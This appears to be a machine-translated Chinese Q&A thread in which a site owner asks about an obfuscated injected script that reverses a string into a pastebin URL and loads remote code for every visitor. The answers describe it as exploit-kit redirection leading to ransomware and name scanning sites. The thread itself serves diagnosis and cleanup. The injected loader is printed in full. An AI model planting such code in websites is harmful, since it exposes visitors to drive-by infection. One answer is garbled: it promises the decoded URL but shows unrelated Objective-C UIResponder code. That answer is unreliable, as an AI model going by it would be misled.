Google Scanner检测到的Javascript恶意软件

时间:2015-12-04 01:46:29

标签: javascript web malware

我最近在我的网站上看到了以下代码

<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>

这段代码有什么作用?我是XSS的受害者吗?我的托管公司可以做什么,比如恶意软件扫描程序等吗?

3 个答案:

答案 0 :(得分:0)

该文本被反转形成一个pastebin链接 - 该pastebin上的脚本被加载并在浏览器中与其余的站点代码一起运行。

答案 1 :(得分:0)

这是Exploit Kit的重定向代码..实际的URL是

#import "UIResponder+FirstResponder.h"

static __weak id currentFirstResponder;

@implementation UIResponder (FirstResponder)

+(id)currentFirstResponder {
    currentFirstResponder = nil;
    [[UIApplication sharedApplication] sendAction:@selector(findFirstResponder:) to:nil from:nil forEvent:nil];
    return currentFirstResponder;
}

-(void)findFirstResponder:(id)sender {
    currentFirstResponder = self;
}

请从您服务器上托管的所有网页中删除此代码。

答案 2 :(得分:0)

您的网站遭到入侵(黑客攻击)并注入了恶意的javascript代码。

它使用多种重定向/编码方法,但最后,将访问者推送到Angler EK(漏洞利用工具包),然后尝试在用户身上使用CryptoWall。

您可以尝试在此处扫描:

https://sitecheck.sucuri.net

http://www.unmaskparasites.com/

查找有关恶意软件的更多详细信息。

感谢,